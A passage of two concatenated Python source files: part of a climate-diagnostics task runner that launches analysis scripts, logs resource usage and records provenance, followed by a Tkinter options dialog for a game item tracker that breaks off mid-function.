'Memory (GB)',
'Memory (%)',
'Disk read (GB)',
'Disk write (GB)',
]
fmt = '{}\t' * len(entries[:-1]) + '{}\n'
yield (fmt.format(*entries), 0.)
# Compute resource usage
gigabyte = float(2**30)
precision = [1, 1, None, 1, None, 3, 3]
cache = {}
max_memory = 0.
try:
process.io_counters()
except AttributeError:
counters_available = False
else:
counters_available = True
while process.is_running():
try:
if children:
# Include child processes
processes = process.children(recursive=True)
processes.append(process)
else:
processes = [process]
# Update resource usage
for proc in cache:
# Set cpu percent and memory usage to 0 for old processes
if proc not in processes:
cache[proc][1] = 0
cache[proc][2] = 0
cache[proc][3] = 0
for proc in processes:
# Update current processes
cache[proc] = [
proc.cpu_times().user + proc.cpu_times().system,
proc.cpu_percent(),
proc.memory_info().rss / gigabyte,
proc.memory_percent(),
(proc.io_counters().read_bytes /
gigabyte if counters_available else float('nan')),
(proc.io_counters().write_bytes /
gigabyte if counters_available else float('nan')),
]
except (OSError, psutil.AccessDenied, psutil.NoSuchProcess):
# Try again if an error occurs because some process died
continue
# Create and yield log entry
entries = [sum(entry) for entry in zip(*cache.values())]
entries.insert(0, time.time() - start_time)
entries = [round(entry, p) for entry, p in zip(entries, precision)]
entries.insert(0, datetime.datetime.utcnow())
max_memory = max(max_memory, entries[4])
yield (fmt.format(*entries), max_memory)
@contextlib.contextmanager
def resource_usage_logger(pid, filename, interval=1, children=True):
"""Log resource usage."""
halt = threading.Event()
def _log_resource_usage():
"""Write resource usage to file."""
process = psutil.Process(pid)
start_time = time.time()
with open(filename, 'w') as file:
for msg, max_mem in _get_resource_usage(process, start_time,
children):
file.write(msg)
time.sleep(interval)
if halt.is_set():
logger.info('Maximum memory used (estimate): %.1f GB',
max_mem)
logger.info(
'Sampled every second. It may be inaccurate if short '
'but high spikes in memory consumption occur.')
return
thread = threading.Thread(target=_log_resource_usage)
thread.start()
try:
yield
finally:
halt.set()
thread.join()
def _py2ncl(value, var_name=''):
"""Format a structure of Python list/dict/etc items as NCL."""
txt = var_name + ' = ' if var_name else ''
if value is None:
txt += '_Missing'
elif isinstance(value, str):
txt += '"{}"'.format(value)
elif isinstance(value, (list, tuple)):
if not value:
txt += '_Missing'
else:
if isinstance(value[0], numbers.Real):
type_ = numbers.Real
else:
type_ = type(value[0])
if any(not isinstance(v, type_) for v in value):
raise ValueError(
"NCL array cannot be mixed type: {}".format(value))
txt += '(/{}/)'.format(', '.join(_py2ncl(v) for v in value))
elif isinstance(value, dict):
if not var_name:
raise ValueError(
"NCL does not support nested dicts: {}".format(value))
txt += 'True\n'
for key in value:
txt += '{}@{} = {}\n'.format(var_name, key, _py2ncl(value[key]))
else:
txt += str(value)
return txt
def write_ncl_settings(settings, filename, mode='wt'):
"""Write a dictionary with generic settings to NCL file."""
logger.debug("Writing NCL configuration file %s", filename)
def _ncl_type(value):
"""Convert some Python types to NCL types."""
typemap = {
bool: 'logical',
str: 'string',
float: 'double',
int: 'int64',
dict: 'logical',
}
for type_ in typemap:
if isinstance(value, type_):
return typemap[type_]
raise ValueError("Unable to map {} to an NCL type".format(type(value)))
lines = []
# ignore some settings for NCL diagnostic
ignore_settings = ['profile_diagnostic', ]
for sett in ignore_settings:
settings_copy = dict(settings)
if 'diag_script_info' not in settings_copy:
settings.pop(sett, None)
else:
settings_copy['diag_script_info'].pop(sett, None)
for var_name, value in sorted(settings_copy.items()):
if isinstance(value, (list, tuple)):
# Create an NCL list that can span multiple files
lines.append('if (.not. isdefined("{var_name}")) then\n'
' {var_name} = NewList("fifo")\n'
'end if\n'.format(var_name=var_name))
for item in value:
lines.append('ListAppend({var_name}, new(1, {type}))\n'
'i = ListCount({var_name}) - 1'.format(
var_name=var_name, type=_ncl_type(item)))
lines.append(_py2ncl(item, var_name + '[i]'))
else:
# Create an NCL variable that overwrites previous variables
lines.append('if (isvar("{var_name}")) then\n'
' delete({var_name})\n'
'end if\n'.format(var_name=var_name))
lines.append(_py2ncl(value, var_name))
with open(filename, mode) as file:
file.write('\n'.join(lines))
file.write('\n')
class BaseTask:
"""Base class for defining task classes."""
def __init__(self, ancestors=None, name='', products=None):
"""Initialize task."""
self.ancestors = [] if ancestors is None else ancestors
self.products = set() if products is None else set(products)
self.output_files = None
self.name = name
self.activity = None
self.priority = 0
def initialize_provenance(self, recipe_entity):
"""Initialize task provenance activity."""
if self.activity is not None:
raise ValueError(
"Provenance of {} already initialized".format(self))
self.activity = get_task_provenance(self, recipe_entity)
def flatten(self):
"""Return a flattened set of all ancestor tasks and task itself."""
tasks = TaskSet()
for task in self.ancestors:
tasks.update(task.flatten())
tasks.add(self)
return tasks
def run(self, input_files=None):
"""Run task."""
if not self.output_files:
if input_files is None:
input_files = []
for task in self.ancestors:
input_files.extend(task.run())
logger.info("Starting task %s in process [%s]", self.name,
os.getpid())
start = datetime.datetime.now()
self.output_files = self._run(input_files)
runtime = datetime.datetime.now() - start
logger.info("Successfully completed task %s (priority %s) in %s",
self.name, self.priority, runtime)
return self.output_files
@abc.abstractmethod
def _run(self, input_files):
"""Run task."""
def get_product_attributes(self) -> dict:
"""Return a mapping of product attributes."""
return {
product.filename: product.attributes
for product in self.products
}
def print_ancestors(self):
"""Return a nicely formatted description."""
txt = 'ancestors:\n{}'.format('\n\n'.join(
textwrap.indent(str(task), prefix=' ')
for task in self.ancestors) if self.ancestors else 'None')
return txt
def __repr__(self):
"""Return canonical string representation."""
return f"{self.__class__.__name__}({repr(self.name)})"
class ResumeTask(BaseTask):
"""Task for re-using preprocessor output files from a previous run."""
def __init__(self, prev_preproc_dir, preproc_dir, name):
"""Create a resume task."""
# Set the path to the file resulting from running this task
self._metadata_file = preproc_dir / 'metadata.yml'
# Reconstruct output
prev_metadata_file = prev_preproc_dir / 'metadata.yml'
with prev_metadata_file.open('rb') as file:
prev_metadata = yaml.safe_load(file)
products = set()
for prov_filename, attributes in prev_metadata.items():
# Update the filename in case the output directory was moved
# since the original run
filename = str(prev_preproc_dir / Path(prov_filename).name)
attributes['filename'] = filename
product = TrackedFile(filename,
attributes,
prov_filename=prov_filename)
products.add(product)
super().__init__(ancestors=None, name=name, products=products)
def _run(self, _):
"""Return the result of a previous run."""
metadata = self.get_product_attributes()
# Write metadata to file
self._metadata_file.parent.mkdir(parents=True)
with self._metadata_file.open('w') as file:
yaml.safe_dump(metadata, file)
return [str(self._metadata_file)]
class DiagnosticError(Exception):
"""Error in diagnostic."""
class DiagnosticTask(BaseTask):
"""Task for running a diagnostic."""
def __init__(self, script, settings, output_dir, ancestors=None, name=''):
"""Create a diagnostic task."""
super().__init__(ancestors=ancestors, name=name)
self.script = script
self.settings = settings
self.output_dir = output_dir
self.cmd = self._initialize_cmd()
self.env = self._initialize_env()
self.log = Path(settings['run_dir']) / 'log.txt'
self.resource_log = Path(settings['run_dir']) / 'resource_usage.txt'
def _initialize_cmd(self):
"""Create an executable command from script."""
diagnostics_root = DIAGNOSTICS.scripts
script = self.script
script_file = (diagnostics_root / Path(script).expanduser()).absolute()
err_msg = f"Cannot execute script '{script}' ({script_file})"
if not script_file.is_file():
raise DiagnosticError(f"{err_msg}: file does not exist.")
cmd = []
interpreters = {
'jl': 'julia',
'ncl': 'ncl',
'py': 'python',
'r': 'Rscript',
}
args = {
'ncl': ['-n', '-p'],
}
if self.settings['profile_diagnostic']:
profile_file = Path(self.settings['run_dir'], 'profile.json')
args['py'] = ['-m', 'vprof', '-o', str(profile_file), '-c', 'c']
ext = script_file.suffix.lower()[1:]
if ext in interpreters:
if ext == 'py' and sys.executable:
interpreter = sys.executable
else:
interpreter = which(interpreters[ext])
if interpreter is None:
raise DiagnosticError(
f"{err_msg}: program '{interpreters[ext]}' not installed.")
cmd.append(interpreter)
elif not os.access(script_file, os.X_OK):
raise DiagnosticError(
f"{err_msg}: non-executable file with unknown extension "
f"'{script_file.suffix}'.")
cmd.extend(args.get(ext, []))
cmd.append(str(script_file))
return cmd
def _initialize_env(self):
"""Create an environment for executing script."""
ext = Path(self.script).suffix.lower()
env = {}
if ext in ('.py', '.jl'):
# Set non-interactive matplotlib backend
env['MPLBACKEND'] = 'Agg'
if ext in ('.r', '.ncl'):
# Make diag_scripts path available to diagostic script
env['diag_scripts'] = str(DIAGNOSTICS.scripts)
if ext == '.jl':
# Set the julia virtual environment
env['JULIA_LOAD_PATH'] = "{}:{}".format(
DIAGNOSTICS.path / 'install' / 'Julia',
os.environ.get('JULIA_LOAD_PATH', ''),
)
return env
def write_settings(self):
"""Write settings to file."""
run_dir = Path(self.settings['run_dir'])
run_dir.mkdir(parents=True, exist_ok=True)
# ignore some settings for diagnostic
ignore_settings = ['profile_diagnostic', ]
for sett in ignore_settings:
settings_copy = dict(self.settings)
settings_copy.pop(sett, None)
filename = run_dir / 'settings.yml'
filename.write_text(yaml.safe_dump(settings_copy))
# If running an NCL script:
if Path(self.script).suffix.lower() == '.ncl':
# Also write an NCL file and return the name of that instead.
return self._write_ncl_settings()
return str(filename)
def _write_ncl_settings(self):
"""Write settings to NCL file."""
filename = Path(self.settings['run_dir']) / 'settings.ncl'
config_user_keys = {
'run_dir',
'plot_dir',
'work_dir',
'output_file_type',
'log_level',
}
settings = {'diag_script_info': {}, 'config_user_info': {}}
for key, value in self.settings.items():
if key in config_user_keys:
settings['config_user_info'][key] = value
elif not isinstance(value, dict):
settings['diag_script_info'][key] = value
else:
settings[key] = value
write_ncl_settings(settings, filename)
return filename
def _control_ncl_execution(self, process, lines):
"""Check if an error has occurred in an NCL script.
Apparently NCL does not automatically exit with a non-zero exit
code if an error occurs, so we take care of that here.
"""
ignore_warnings = [
warning.strip()
for warning in self.settings.get('ignore_ncl_warnings', [])
]
errors = ['error:', 'fatal:']
if self.settings['exit_on_ncl_warning']:
errors.append('warning:')
msg = ("An error occurred during execution of NCL script {}, "
"see the log in {}".format(self.script, self.log))
warned = False
for line in lines:
if line.strip() in ignore_warnings:
continue
if 'warning:' in line:
logger.warning("NCL: %s", line)
warned = True
for error in errors:
if error in line:
logger.error(msg)
logger.error("NCL: %s", line)
try:
process.kill()
except OSError: # ignore error if process already exited
pass
else:
logger.error("Killed process.")
raise DiagnosticError(msg)
if warned:
logger.warning(
"There were warnings during the execution of NCL script %s, "
"for details, see the log %s", self.script, self.log)
def _start_diagnostic_script(self, cmd, env):
"""Start the diagnostic script."""
logger.info("Running command %s", cmd)
logger.debug("in environment\n%s", pprint.pformat(env))
cwd = self.settings['run_dir']
logger.debug("in current working directory: %s", cwd)
logger.info("Writing output to %s", self.output_dir)
logger.info("Writing plots to %s", self.settings['plot_dir'])
logger.info("Writing log to %s", self.log)
rerun_msg = 'cd {}; '.format(cwd)
if env:
rerun_msg += ' '.join('{}="{}"'.format(k, env[k]) for k in env)
if "vprof" in cmd:
script_args = ' "' + cmd[-1] + '"'
rerun_msg += ' ' + ' '.join(cmd[:-1]) + script_args
else:
rerun_msg += ' ' + ' '.join(cmd)
logger.info("To re-run this diagnostic script, run:\n%s", rerun_msg)
complete_env = dict(os.environ)
complete_env.update(env)
process = subprocess.Popen(
cmd,
bufsize=2**20, # Use a large buffer to prevent NCL crash
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
cwd=cwd,
env=complete_env,
)
return process
def _run(self, input_files):
"""Run the diagnostic script."""
if self.script is None: # Run only preprocessor
output_files = []
return output_files
ext = Path(self.script).suffix.lower()
if ext == '.ncl':
self.settings['input_files'] = [
f for f in input_files
if f.endswith('.ncl') or os.path.isdir(f)
]
else:
self.settings['input_files'] = [
f for f in input_files
if f.endswith('.yml') or os.path.isdir(f)
]
env = dict(self.env)
cmd = list(self.cmd)
settings_file = self.write_settings()
if ext == '.ncl':
env['settings'] = settings_file
else:
if self.settings['profile_diagnostic']:
script_file = cmd.pop()
combo_with_settings = script_file + ' ' + str(settings_file)
cmd.append(combo_with_settings)
else:
cmd.append(settings_file)
process = self._start_diagnostic_script(cmd, env)
returncode = None
with resource_usage_logger(process.pid, self.resource_log),\
open(self.log, 'ab') as log:
last_line = ['']
while returncode is None:
returncode = process.poll()
txt = process.stdout.read()
log.write(txt)
# Check if an error occurred in an NCL script
# Last line is treated separately to avoid missing
# error messages spread out over multiple lines.
if ext == '.ncl':
txt = txt.decode(encoding='utf-8', errors='ignore')
lines = txt.split('\n')
self._control_ncl_execution(process, last_line + lines)
last_line = lines[-1:]
# wait, but not long because the stdout buffer may fill up:
# https://docs.python.org/3.6/library/subprocess.html#subprocess.Popen.stdout
time.sleep(0.001)
if returncode == 0:
logger.debug("Script %s completed successfully", self.script)
self._collect_provenance()
return [self.output_dir]
raise DiagnosticError(
"Diagnostic script {} failed with return code {}. See the log "
"in {}".format(self.script, returncode, self.log))
def _collect_provenance(self):
"""Process provenance information provided by the diagnostic script."""
provenance_file = Path(
self.settings['run_dir']) / 'diagnostic_provenance.yml'
if not provenance_file.is_file():
logger.warning(
"No provenance information was written to %s. Unable to "
"record provenance for files created by diagnostic script %s "
"in task %s", provenance_file, self.script, self.name)
return
logger.debug("Collecting provenance from %s", provenance_file)
start = time.time()
table = yaml.safe_load(provenance_file.read_text())
ignore = (
'auxiliary_data_dir',
'exit_on_ncl_warning',
'input_files',
'log_level',
'output_file_type',
'plot_dir',
'profile_diagnostic',
'recipe',
'run_dir',
'version',
'write_ncl_interface',
'work_dir',
)
attrs = {
'script_file': self.script,
}
for key in self.settings:
if key not in ignore:
attrs[key] = self.settings[key]
ancestor_products = {
p.filename: p
for a in self.ancestors for p in a.products
}
valid = True
for filename, attributes in table.items():
# copy to avoid updating other entries if file contains anchors
attributes = deepcopy(attributes)
ancestor_files = attributes.pop('ancestors', [])
if not ancestor_files:
logger.warning(
"No ancestor files specified for recording provenance of "
"%s, created by diagnostic script %s in task %s", filename,
self.script, self.name)
valid = False
ancestors = set()
if isinstance(ancestor_files, str):
logger.warning(
"Ancestor file(s) %s specified for recording provenance "
"of %s, created by diagnostic script %s in task %s is "
"a string but should be a list of strings", ancestor_files,
filename, self.script, self.name)
ancestor_files = [ancestor_files]
for ancestor_file in ancestor_files:
if ancestor_file in ancestor_products:
ancestors.add(ancestor_products[ancestor_file])
else:
valid = False
logger.warning(
"Invalid ancestor file %s specified for recording "
"provenance of %s, created by diagnostic script %s "
"in task %s", ancestor_file, filename, self.script,
self.name)
attributes.update(deepcopy(attrs))
TAGS.replace_tags_in_dict(attributes)
product = TrackedFile(filename, attributes, ancestors)
product.initialize_provenance(self.activity)
_write_citation_files(product.filename, product.provenance)
product.save_provenance()
self.products.add(product)
if not valid:
logger.warning(
"Valid ancestor files for diagnostic script %s in task %s "
"are:\n%s", self.script, self.name,
'\n'.join(ancestor_products))
logger.debug("Collecting provenance of task %s took %.1f seconds",
self.name,
time.time() - start)
def __repr__(self):
"""Get human readable description."""
settings_string = pprint.pformat(self.settings)
string = (f"{self.__class__.__name__}: {self.name}\n"
f"script: {self.script}\n"
f"settings:\n{settings_string}\n"
f"{self.print_ancestors()}\n")
return string
class TaskSet(set):
"""Container for tasks."""
def flatten(self) -> 'TaskSet':
"""Flatten the list of tasks."""
return TaskSet(t for task in self for t in task.flatten())
def get_independent(self) -> 'TaskSet':
"""Return a set of independent tasks."""
independent_tasks = TaskSet()
all_tasks = self.flatten()
for task in all_tasks:
if not any(task in t.ancestors for t in all_tasks):
independent_tasks.add(task)
return independent_tasks
def run(self, max_parallel_tasks: int = None) -> None:
"""Run tasks.
Parameters
----------
max_parallel_tasks : int
Number of processes to run. If `1`, run the tasks sequentially.
"""
if max_parallel_tasks == 1:
self._run_sequential()
else:
self._run_parallel(max_parallel_tasks)
def _run_sequential(self) -> None:
"""Run tasks sequentially."""
n_tasks = len(self.flatten())
logger.info("Running %s tasks sequentially", n_tasks)
tasks = self.get_independent()
for task in sorted(tasks, key=lambda t: t.priority):
task.run()
def _run_parallel(self, max_parallel_tasks=None):
"""Run tasks in parallel."""
scheduled = self.flatten()
running: Dict[Type[BaseTask], Type[ApplyResult]] = {}
n_tasks = n_scheduled = len(scheduled)
n_running = 0
if max_parallel_tasks is None:
max_parallel_tasks = os.cpu_count()
max_parallel_tasks = min(max_parallel_tasks, n_tasks)
logger.info("Running %s tasks using %s processes", n_tasks,
max_parallel_tasks)
def done(task):
"""Assume a task is done if it not scheduled or running."""
return not (task in scheduled or task in running)
with Pool(processes=max_parallel_tasks) as pool:
while scheduled or running:
# Submit new tasks to pool
for task in sorted(scheduled, key=lambda t: t.priority):
if len(running) >= max_parallel_tasks:
break
if all(done(t) for t in task.ancestors):
future = pool.apply_async(_run_task, [task])
running[task] = future
scheduled.remove(task)
# Handle completed tasks
ready = {t for t in running if running[t].ready()}
for task in ready:
_copy_results(task, running[task])
running.pop(task)
# Wait if there are still tasks running
if running:
time.sleep(0.1)
# Log progress message
if len(scheduled) != n_scheduled or len(running) != n_running:
n_scheduled, n_running = len(scheduled), len(running)
n_done = n_tasks - n_scheduled - n_running
logger.info(
"Progress: %s tasks running, %s tasks waiting for "
"ancestors, %s/%s done", n_running, n_scheduled,
n_done, n_tasks)
logger.info("Successfully completed all tasks.")
pool.close()
pool.join()
def _copy_results(task, future):
"""Update task with the results from the remote process."""
task.output_files, task.products = future.get()
def _run_task(task):
"""Run task and return the result."""
output_files = task.run()
return output_files, task.products
|
option_picker.py
|
import traceback
from Tkinter import *
from multiprocessing import Queue
from tkColorChooser import askcolor
import json
from string import maketrans, lower
import re
import ttk
import pygame.sysfont
from options import Options
import logging
import urllib2
import webbrowser
import platform
import threading
from error_stuff import log_error
class OptionsMenu(object):
"""
These are the standard save and load options functions.
"""
def __init__(self):
self.options = Options()
self.root = Tk()
self.root.destroy()
# Our 'safe' list of fonts that should work in pygame
self.fonts = ['Andalus', 'Angsana New', 'AngsanaUPC', 'Arial', 'Arial Black', 'Browallia New', 'BrowalliaUPC',
'Comic Sans MS', 'Cordia New', 'CordiaUPC', 'Courier New', 'DFKai-SB', 'David', 'DilleniaUPC',
'Estrangelo Edessa', 'FrankRuehl', 'Franklin Gothic Medium', 'Gautami', 'Georgia', 'Impact',
'IrisUPC', 'JasmineUPC', 'KodchiangUPC', 'Latha', 'LilyUPC', 'Lucida Console', 'MV Boli',
'Mangal', 'Microsoft Sans Serif', 'Miriam', 'Miriam Fixed', 'Narkisim', 'Raavi', 'Rod', 'Shruti',
'SimHei', 'Simplified Arabic', 'Simplified Arabic Fixed', 'Sylfaen', 'Tahoma', 'Times New Roman',
'Traditional Arabic', 'Trebuchet MS', 'Tunga', 'Verdana', 'simsunnsimsun']
self.game_versions = ['Rebirth',
'Afterbirth', 'Afterbirth+', 'Antibirth']
self.network_queue = Queue()
# Check if the system has the fonts installed, and remove them from the list if it doesn't
try:
valid_pygame_fonts = [lower(x.replace(" ", ""))
for x in self.fonts]
system_fonts = pygame.sysfont.get_fonts()
to_delete = []
for index, font in enumerate(valid_pygame_fonts):
if font not in system_fonts:
to_delete += [index]
for index in to_delete[::-1]:
del self.fonts[index]
except:
log_error(
"There may have been an error detecting system fonts.\n" + traceback.print_exc())
pretty_name_map = {"read_from_server": "Watch Someone Else",
"write_to_server": "Let Others Watch Me",
"twitch_name": "Their Twitch Name",
"bold_font": "Bold",
"blck_cndl_mode": "BLCK CNDL mode",
"custom_title_enabled": "Change Window Title",
"log_file_check_seconds": "Check log file every"}
label_after_text = {"message_duration": "second(s)",
"framerate_limit": "fps",
"log_file_check_seconds": "second(s)"}
connection_labels = {"starting": "Connecting to server for player list...",
"done": "Connecting to server for player list... Done",
"fail": "Connecting to server for player list... Failed"}
def pretty_name(self, s):
# Change from a var name to something you'd show the users
if self.pretty_name_map.has_key(s):
return self.pretty_name_map.get(s)
return " ".join(s.split("_")).title()
def color_callback(self, source):
# Prompt a color picker, set the options and the background/foreground of the button
nums, hex_color = askcolor(color=getattr(
self.options, source), title="Color Chooser")
if hex_color:
opposite = self.opposite_color(hex_color)
setattr(self.options, source, hex_color.upper())
self.buttons[source].configure(bg=hex_color, fg=opposite)
def checkbox_callback(self):
# Just for the "show decription" checkbox -- to disable the message duration entry
if not self.checks.get("show_description").get():
self.entries["message_duration"].configure(state=DISABLED)
else:
self.entries["message_duration"].configure(state=NORMAL)
# Disable custom message if we don't have to show it
if not self.checks.get("show_status_message").get():
self.entries["status_message"].configure(state=DISABLED)
else:
self.entries["status_message"].configure(state=NORMAL)
# Just for the "Custom Title Enabled" checkbox -- to disable the "Custom Title" entry
if not self.checks.get("custom_title_enabled").get():
self.entries["custom_title"].configure(state=DISABLED)
else:
self.entries["custom_title"].configure(state=NORMAL)
# Writing to server occurs when state changes, so enable read delay if we are reading
if self.checks.get("read_from_server").get():
self.entries["read_delay"].grid()
self.entries["twitch_name"].grid()
self.labels["read_delay"].grid()
self.labels["twitch_name"].grid()
else:
self.entries["read_delay"].grid_remove()
self.entries["twitch_name"].grid_remove()
self.labels["read_delay"].grid_remove()
self.labels["twitch_name"].grid_remove()
self.labels["server_connect_label"].config(text="")
if self.checks.get("change_server").get():
self.entries["trackerserver_url"].grid()
self.labels["trackerserver_url"].grid()
else:
self.entries["trackerserver_url"].grid_remove()
self.labels["trackerserver_url"].grid_remove()
# Disable authkey if we don't write to server
if self.checks.get("write_to_server").get():
self.entries["trackerserver_authkey"].grid()
self.labels["trackerserver_authkey"].grid()
self.buttons["authkey_button"].grid()
else:
self.entries["trackerserver_authkey"].grid_remove()
self.labels["trackerserver_authkey"].grid_remove()
self.buttons["authkey_button"].grid_remove()
def read_callback(self):
if self.checks.get("read_from_server").get():
self.checks.get("write_to_server").set(0)
self.labels["server_connect_label"].config(
text=self.connection_labels["starting"])
t = threading.Thread(target=self.get_server_userlist_and_enqueue)
t.start()
self.checkbox_callback()
def write_callback(self):
if self.checks.get("write_to_server").get():
self.checks.get("read_from_server").set(0)
self.checkbox_callback()
def save_callback(self):
# Callback for the "save" option -- rejiggers options and saves to options.json, then quits
for key, value in self.entries.iteritems():
if key in self.integer_keys:
# Cast this as a float first to avoid errors if the user puts a value of 1.0 in an options, for example
setattr(self.options, key, int(float(value.get())))
elif key in self.float_keys:
val = float(value.get())
setattr(self.options, key, val)
elif hasattr(value, "get"):
setattr(self.options, key, value.get())
for key, value in self.checks.iteritems():
setattr(self.options, key, True if value.get() else False)
self.root.destroy()
def seconds_to_text(self, seconds):
if seconds < 60:
return str(seconds) + " second" + ("s" if seconds > 1 else "")
minutes = seconds / 60
if minutes < 60:
return str(minutes) + " minute" + ("s" if minutes > 1 else "")
hours = minutes / 60
if hours < 24:
return str(hours) + " hour" + ("s" if hours > 1 else "")
days = hours / 24
return str(days) + " day" + ("s" if days > 1 else "")
def get_server_userlist_and_enqueue(self):
try:
url = self.entries['trackerserver_url'].get() + \
"/tracker/api/userlist/"
json_state = urllib2.urlopen(url).read()
users = json.loads(json_state)
success = True
except Exception:
log_error(
"Problem getting userlist from tracker server\n" + traceback.format_exc())
users = []
success = False
network_result = {"users": users, "success": success}
self.network_queue.put(network_result)
def get_server_twitch_client_id(self):
try:
url = self.entries['trackerserver_url'].get(
) + "/tracker/api/twitchclientid/"
return urllib2.urlopen(url).read()
except Exception:
log_error(
"Couldn't get twitch client id from tracker server\n" + traceback.format_exc())
return None
def process_network_results(self):
# OSX qSize is not emplemented use empty rather.
while not self.network_queue.empty():
try:
network_result = self.network_queue.get(0)
users_combobox_list = []
for user in network_result["users"]:
formatted_time_ago = self.seconds_to_text(user["seconds"])
list_entry = user["name"] + \
" (updated " + formatted_time_ago + " ago)"
users_combobox_list.append(list_entry)
self.entries['twitch_name']['values'] = users_combobox_list
label = "done" if network_result["success"] else "fail"
self.labels["server_connect_label"].config(
text=self.connection_labels[label])
except Queue.Empty:
pass
self.root.after(100, self.process_network_results)
def trim_name(self, event):
name = self.entries['twitch_name'].get()
name = name.partition(" (")[0]
self.entries['twitch_name'].set(name)
# From: http://code.activestate.com/recipes/527747-invert-css-hex-colors/
def opposite_color(self, color):
# Get the opposite color of a hex color, just to make text on buttons readable
color = color.lower()
table = maketrans('0123456789abcdef', 'fedcba9876543210')
return str(color).translate(table).upper()
# From: http://stackoverflow.com/questions/4140437/interactively-validating-entry-widget-content-in-tkinter
def ValidateNumeric(self, d, i, P, s, S, v, V, W):
# This validation is a biiit janky, just some crazy regex that checks P (value of entry after modification)
return P == "" or re.search("^\d+(\.\d*)?$", P) is not None
def run(self):
# Create root
self.root = Tk()
self.root.attributes("-topmost", True)
self.root.wm_title("Item Tracker Options")
self.root.resizable(False, False)
if platform.system() == "Darwin":
self.root.iconbitmap('options.ico')
else:
self.root.iconbitmap(default='options.ico')
# Generate numeric options by looping over option types
self.integer_keys = ["message_duration",
"framerate_limit", "read_delay"]
self.float_keys = ["size_multiplier", "log_file_check_seconds"]
self.entries = {}
self.labels = {}
self.checks = {}
self.buttons = {}
# Draw the "Text Options" box
text_options_frame = LabelFrame(
self.root, text="Text Options", padx=20, pady=20)
text_options_frame.grid(row=0, column=0, padx=5, pady=5)
validate_numeric_field = (self.root.register(
self.ValidateNumeric), '%d', '%i', '%P', '%s', '%S', '%v', '%V', '%W')
next_row = 0
for index, opt in enumerate(["message_duration"]):
Label(text_options_frame, text=self.pretty_name(
opt)).grid(row=next_row)
self.entries[opt] = Entry(
text_options_frame, validate="key", validatecommand=validate_numeric_field)
self.entries[opt].grid(row=next_row, column=1)
self.entries[opt].insert(0, getattr(self.options, opt))
if opt in self.label_after_text:
Label(text_options_frame, text=self.label_after_text[opt]).grid(
row=next_row, column=2)
next_row += 1
for index, opt in enumerate(["show_font"]):
Label(text_options_frame, text=self.pretty_name(
opt)).grid(row=next_row)
initialfont = StringVar()
initialfont.set(getattr(self.options, opt))
self.entries[opt] = ttk.Combobox(text_options_frame, values=sorted(
self.fonts), textvariable=initialfont, state='readonly')
self.entries[opt].grid(row=next_row, column=1)
for index, opt in enumerate(["bold_font"]):
self.checks[opt] = IntVar()
c = Checkbutton(text_options_frame, text=self.pretty_name(
opt), variable=self.checks[opt])
c.grid(row=next_row, column=2)
next_row += 1
if getattr(self.options, opt):
c.select()
for index, opt in enumerate(["status_message"]):
Label(text_options_frame, text=self.pretty_name(
opt)).grid(row=next_row)
self.entries[opt] = Entry(text_options_frame)
self.entries[opt].grid(row=next_row, column=1)
self.entries[opt].insert(0, getattr(self.options, opt))
next_row += 1
text_checkboxes = ["show_description",
"show_status_message", "word_wrap"]
for index, opt in enumerate(text_checkboxes):
self.checks[opt] = IntVar()
c = Checkbutton(text_options_frame, text=self.pretty_name(
opt), variable=self.checks[opt])
c.grid(row=len(text_checkboxes) + 1 + index / 2,
column=index % 2) # 2 checkboxes per row
if getattr(self.options, opt):
c.select()
# Disable letting the user set the message duration if the show description option is disabled
if opt == "show_description" or opt == "show_status_message":
c.configure(command=self.checkbox_callback)
# Draw the other options box
display_options_frame = LabelFrame(
self.root, text="", padx=20, pady=20)
display_options_frame.grid(row=1, column=0, padx=5, pady=5)
next_row = 0
for index, opt in enumerate(["game_version"]):
Label(display_options_frame, text=self.pretty_name(
opt)).grid(row=next_row)
initialversion = StringVar()
initialversion.set(getattr(self.options, opt))
self.entries[opt] = ttk.Combobox(
display_options_frame, values=self.game_versions, textvariable=initialversion, state='readonly')
self.entries[opt].grid(row=next_row, column=1)
next_row += 1
for index, opt in enumerate(["framerate_limit", "log_file_check_seconds", "size_multiplier"]):
Label(display_options_frame, text=self.pretty_name(
opt)).grid(row=next_row)
self.entries[opt] = Entry(
display_options_frame, validate="key", validatecommand=validate_numeric_field)
self.entries[opt].grid(row=next_row, column=1)
self.entries[opt].insert(0, getattr(self.options, opt))
if opt in self.label_after_text:
Label(display_options_frame, text=self.label_after_text[opt]).grid(
row=next_row, column=2)
next_row += 1
# Generate text options by looping over option types
for index, opt in enumerate(["item_details_link"]):
Label(display_options_frame, text=self.pretty_name(
opt)).grid(row=next_row)
self.entries[opt] = Entry(display_options_frame)
self.entries[opt].grid(row=next_row, column=1)
self.entries[opt].insert(0, getattr(self.options, opt))
next_row += 1
# Generate buttons by looping over option types
for index, opt in enumerate(["background_color", "text_color"]):
self.buttons[opt] = Button(
display_options_frame,
text=self.pretty_name(opt),
bg=getattr(self.options, opt),
fg=self.opposite_color(getattr(self.options, opt)),
command=lambda opt=opt: self.color_callback(opt)
)
self.buttons[opt].grid(row=len(self.entries), column=index)
# Generate checkboxes, with special exception for show_description for message duration
for index, opt in enumerate(
["enable_mouseover", "show_floors", "show_rerolled_items", "show_health_ups",
"show_space_items", "show_blind_icon", "make_items_glow", "blck_cndl_mode",
"check_for_updates", "custom_title_enabled"]):
self.checks[opt] = IntVar()
c = Checkbutton(display_options_frame, text=self.pretty_name(
opt), variable=self.checks[opt])
c.grid(row=len(self.entries) + 1 + index / 2,
column=index % 2) # 2 checkboxes per row
if getattr(self.options, opt):
c.select()
if opt == "custom_title_enabled":
c.configure(command=self.checkbox_callback)
next_row += len(self.entries) / 2 + 1
# Generate label for custom title
Label(display_options_frame, text=self.pretty_name(
"custom_title")).grid(row=next_row)
self.entries["custom_title"] = Entry(display_options_frame)
self.entries["custom_title"].grid(row=next_row, column=1)
self.entries["custom_title"].insert(
0, getattr(self.options, "custom_title"))
next_row += 1
# Draw the "Tournament Settings" box
tournament_settings_frame = LabelFrame(
self.root, text="Tournament Settings", padx=20, pady=20)
tournament_settings_frame.grid(row=0, column=1, rowspan=2, sticky=N)
next_row = 0
for index, opt in enumerate(["change_server"]):
self.checks[opt] = IntVar()
c = Checkbutton(tournament_settings_frame, text=self.pretty_name(
opt), variable=self.checks[opt], indicatoron=False)
c.grid(row=next_row, column=0, pady=2)
c.configure(command=self.checkbox_callback)
if getattr(self.options, opt, False):
c.select()
next_row += 1
# Generate text options by looping over option types
for index, opt in enumerate(["trackerserver_url"]):
self.labels[opt] = Label(
tournament_settings_frame, text=self.pretty_name(opt))
